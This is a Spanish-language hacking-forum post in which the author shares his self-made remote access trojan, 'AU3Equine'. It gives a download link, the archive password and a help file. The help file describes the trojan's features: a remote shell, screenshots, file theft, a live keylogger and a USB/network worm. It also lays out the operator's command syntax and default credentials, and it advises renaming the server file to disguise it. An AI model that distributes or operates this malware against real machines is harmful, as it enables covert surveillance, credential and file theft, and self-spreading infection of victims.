Autor Tema: AU3Equine Nuevo Troyano..  (Leído 2689 veces)

0 Usuarios y 1 Visitante están viendo este tema.

zoneM

  • ***
  • Mensajes: 76
  • Liked: 2
  • ZoneM - Z(1)M
AU3Equine Nuevo Troyano..
« : marzo 29, 2009, 08:35:36 pm »
Hola amigos he programado este pequeño RAT y quiero compartirlo
con la comunidad, me senti un poco apenado por los comentarios que hice en un POST
sobre el tema de los virus y  pues me dedique a hacer este troyano.

Tiene varias funciones esta completamente programado con AutoIT3, la compresión se hizo con UPX
no pesa mas de 500kb; cuando se carga en memoria el server si es un poco escandaloso ya que el proceso
ocupa casi 8000kb, La GUI del cliente necesita algunas mejoras estéticas pero funciona.

Espero comentarios y que hagan sus pruebas.....

FEATURES:

SPAWN A SHELL.
REMOTE SCREENSHOT VIEW
REMOTE FILE DOWNLOADING.
REALTIME KEYLOGGER VIEW.
MANUAL STARTING OF USB INFECTION PROCESS
PASSWORD PROTECTED SERVER



Password del .RAR:  kotex


Descargalo.........

https://www.underground.org.mx/index.php?action=dlattach;topic=23129.0;attach=2696

********************************************************
AU3Equine V 0.1
by ZoneM MxCGen(4e.Ver) 2009.



=========================================================================
Files:

AU3EquineClient.exe     <-- Aplicacion cliente
AU3EquineServer.exe    <-- Aplicacion Servidor
help.rtf                            <-- Este archivo de ayuda
screenshot.jpg

Notas:

El archivo AU3EquineServer.exe puede ser renombrado para disimular su funcion.
El socket por default es el 33890 y la ip es la de loopback "127.0.0.1".

Bugs:
mxcgen.sec<at>gmail.com

=========================================================================

Lista de comandos cliente:


pass@[contraseña]
Este comando se utiliza para identificarse como dueño del server
La contraseña predeterminada es : code&&

Ejemplo:  pass@code&&    Si el pass es correcto el server te saludara.


cmd@[comando]       
Instruccion directa a la consola cmd.exe

ejemplo: cmd@shutdown


path@[ruta]   
     
El path donde se ejecutaran los comandos.

ejemploj: path@C:/windows

Nota:
Si no se especifica una ruta los comandos se ejecutaran solo para la carpeta donde
el server se encuentre , el comando cd no cambia el directorio actual se debe usar
la ruta absoluta y luego el comando DIR.

ejemplo:  path@C:/windows y luego cmd@dir, esto nos daría el listado de ficheros de c:/windows




worm@             
 Activa el proceso de replica a unidades removibles y de red (Parasito).




kl@[start|stop]     
Activa o Desactiva  el keylogger alfanumérico en tiempo real.

ejemplo: kl@start Se mostraran en pantalla las teclas que se estén presionando por el usuario remoto en tiempo real.   



   

giveme@[x:/file_full_path]
Ruta absoluta del archivo que se desea descargar del host infectado.

ejemplo:giveme@c:/windows/secretos/topsecret.c



   
chpass@[NEW_PASS]            
El nuevo password que se desea
ejemplo:  chpass@123456   Esto cambiara el password a 123456

Nota: El cambio no tiene efecto hasta que se reinicie el servidor.
   


   
port@[Port_Number]         
[Numero del puerto TCP donde debe escuchar.
ejemplo: port@666   Esto cambiara el puerto a 666
   
Nota: El cambio no tiene efecto hasta que se reinicie el servidor.   




stop@                    
Detiene y cierra el servidor.


==================================================================




« Última Modificación: abril 17, 2009, 12:29:48 am por zoneM »
i'll be back ¡¡¡¡¡